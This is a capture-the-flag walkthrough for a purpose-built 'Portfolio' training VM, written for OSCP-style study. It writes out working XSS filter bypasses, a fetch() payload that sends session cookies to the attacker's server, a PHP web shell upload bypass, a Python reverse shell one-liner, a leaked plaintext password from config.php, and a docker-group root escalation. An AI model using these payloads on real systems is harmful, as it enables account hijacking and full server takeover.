Skip to main content

CTF: Portfolio Walkthrough


Scenario

A passionate web developer recently launched his personal portfolio website, proudly displaying his projects and sharing his thoughts through a vibrant blog. His focus on design and functionality has left glaring security holes.

As his blog gains popularity, you, a skilled hacker, spot the perfect target. Your mission is clear: exploit the vulnerabilities, compromise his site, and expose his negligence. Every weakness is an opportunity, every oversight a path to control.

In this CTF challenge, you are the hacker. Uncover the flaws, break through the defenses, and leave your mark on the developer’s digital pride.

Welcome to "Portfolio CTF" The game is on. Good luck!

You can download the OVA for the Portfolio CTF from this link


SPOILER ALERT: Do not read further if you intend to solve the CTF challenge on your own. The write-up follows below.


Introduction

I created this Capture The Flag (CTF) machine with dual objectives: to provide a comprehensive training ground for enthusiasts interested in both Client-Side and Server-Side attacks, and to highlight essential skills and vulnerabilities in the cybersecurity field. This machine offers hands-on experience with Stored Cross-Site Scripting (XSS), enabling participants to understand the intricacies of injecting and persistently storing malicious scripts in web applications. It also challenges users to explore File Upload Vulnerabilities, emphasizing the importance of analyzing how servers handle uploaded file content rather than merely checking file extensions. Additionally, the machine encourages the discovery of hardcoded credentials, an essential skill for identifying sensitive information inadvertently left unprotected in code or configuration files. Finally, the Docker group privilege escalation challenge tests participants' problem-solving abilities in a unique way. Overall, this CTF machine delivers a holistic learning experience, equipping participants with critical skills and knowledge for effective cybersecurity practices. It's an excellent preparation tool for the OSCP exam. 

Host Discovery
sudo nmap -sn -vvv -T5 192.168.194.1/24 # 192.168.194.X replace with your NAT network


Enumeration 
Port and Services Enumeration 
export PORTFOLIO=192.168.194.138

Discover all open ports
nmap -p- --open -T4 $PORTFOLIO -oN portfolio.txt

Discover the services running on the open ports 
nmap -p22,80,443 -sCV -T4 $PORTFOLIO -oN portfolio.txt

Add the domain that we discover in the /etc/hosts file 
echo "$PORTFOLIO portfolio.local" | sudo tee -a /etc/hosts



Navigate to the web application 

Inspect the source code of the application and discover the hidden subdomain 

Append the subdomain to the /etc/hosts file

echo "$PORTFOLIO blog.portfolio.local" | sudo tee -a /etc/hosts

Manually exploring the web application

We can see that is a blog application 

There is a login page at /login.php 

There is also a page that we can write a post to the blog at /post.php

Identifying Vulnerabilities 

Let's try to trigger an XSS 

<script>alert('XSS')</script>


We can see that there is some kind of filtering, let's try different html tags in order to trigger the XSS 

Let's try the <img> tag 

<img src="x" onerror="alert('XSS')"/>

We can see that the image tag is filtered as well.

Let's try the <svg> tag

<svg xmlns='' onload='alert("XSS")'/>

We can see that we successfully triggered an XSS attack!

Foothold

Web Application Privilege Escalation (Stealing Session Cookies)

To steal a session cookie we must launch a server and craft a xss payload in order to send as the session cookie.

Launch a python server 

python3 -m http.server 8080

Crafting the XSS payload 

<svg xmlns='' onload='fetch("http://[REDACTED]:8080/exfil?cookies=" + encodeURIComponent(document.cookie))'/>

Stealing the session cookie 

Storing the session cookie to our browser and login to the web application as admin 


Enumerating Admin Portal 

We can see that exists an upload file functionality lets try to upload a php webshell

PHP web shell 

Trying to upload the php webshell 

We receive 2 errors, that the file is not an image and that only jpg and png files are allowed. 

Upload file vulnerability 

Launch Burp Suite 

burpsuite &

Open Burp Suite browser an put the admin session cookie in it 

Try to upload the web.php shell we tried earlier 

Navigate to the Target > Site map find the POST request to the upload page and send it to the Repeater

Bypassing extension 

We can bypass the extension by uploading the web shell with the name web.jpg.php

We can see that we received a different error message that the file is not an image.

Bypassing file type check 

Find an image.png

Find the webshell we want to use 

Create the malicious image by concatenating the image with the web shell and appending them to a new file called image.png.php

cat image.png web.php > image.png.php

Uploading the malicious image

We see that the image uploaded successfully 

Navigate to the folder that the web shell is stored 

We can see that we have RCE to the target machine. 

Getting a reverse shell 

Start a reverse listener 

nc -lvnp 1337

Sending a python reverse shell to the target 

export RHOST="[REDACTED]";export RPORT=1337;python3 -c 'import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Stabilizing our shell 

python3 -c 'import pty;pty.spawn("/bin/bash")'

^Z

stty -echo raw && fg

export TERM=xterm


Privilege Escalation 

From www-data to gpapadopoulos

Check our permissions 

id

Enumerate users 

cat /etc/passwd

List the files of the current directory 

ls -l

cd ../

ls

See config file config.php

cat config.php

We can see that there is the password of the user gpapadopoulos

Login to gpapadopoulos

su - gpapadopoulos # with password Ju5t_4_d3v_mak1ng_s0ftwar3

Get the user flag user.txt

cat user.txt

SSH to gpapadopoulos

ssh gpapadopoulos@portfolio.local

From gpapadopoulos to root

Enumerating system manually 

id

We can see that user gpapadopoulos is in the docker group 

Get a root shell 

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Get the root flag 

cat root.txt



Popular posts from this blog

Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution

During an assessment, I identified a severe security vulnerability within Open eClass, an e-learning platform extensively utilized across educational institutions, notably within Greece, where it is deployed by virtually all Greek Universities and educational entities. Open eClass, developed by GUnet (Greek Universities Network), is instrumental in delivering asynchronous e-learning services. The vulnerability, cataloged under CVE-2024-26503, involves an unrestricted file upload flaw that enables remote code execution (RCE), impacting versions 3.15 and earlier of the platform. This critical security lapse presents a significant risk, potentially allowing unauthorized access and control over the system, thereby compromising the integrity and security of the educational infrastructure. Affected Versions: ●   version <=  3.15 CVSSv3.1 Base Score: 9.1 ( Critical ) CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Exploitation Guide The vulnerability can be e...

Chamilo LMS: CVE-2024-27524 & CVE-2024-27525

CVE-2024-27524:  Stored XSS in tickets Severity:  High  (Base Score  7.1 ) CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H   Mitigation: Upgrade to Chamilo LMS 1.11.28 and above. Patch:  https://github.com/chamilo/chamilo-lms/commit/53275c152275958b33a1f87a21843daa52fb543a CVE-2024-27525:  Self XSS in social network Base Score:  Medium  (Base Score  4.6 ) CVSS Vector:  CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L Mitigation: Upgrade to Chamilo LMS 1.11.28 and above. Patch:  https://github.com/chamilo/chamilo-lms/commit/a63e03ef961e7bf2dab56f4ede6f87edef40ba0c Overview This advisory covers the discovery of two vulnerabilities within Chamilo LMS, an open-source learning management system (LMS) widely used across educational institutions. These vulnerabilities—stored cross-site scripting (Stored XSS) and self-cross-site scripting (Self XSS)—pose different levels of security risks but highlight critical consideration...

How I Use Obsidian for Penetration Testing, CVE Hunting, and Studying

In the ever-evolving realm of cyber security, the tools and techniques at our disposal are as varied as the threats we aim to counteract. Among these tools, note-taking applications play a pivotal role, not just in organizing our thoughts but in streamlining our entire workflow. Today, I'm excited to share how Obsidian, a tool I embraced over two and a half years ago while preparing for my eJPT exam, has become an indispensable ally in my journey through penetration testing, CVE hunting, and continuous learning. If you're not yet familiar with Obsidian, it's a robust note-taking application that operates on a local collection of plain text Markdown files. What sets it apart is its capability to interlink ideas, forming an expansive web of knowledge that is both intuitive and comprehensive to explore. Through considerable customization, I've developed what I consider to be an ideal method for consolidating notes, insights, and projects into a unified workspace. Here'...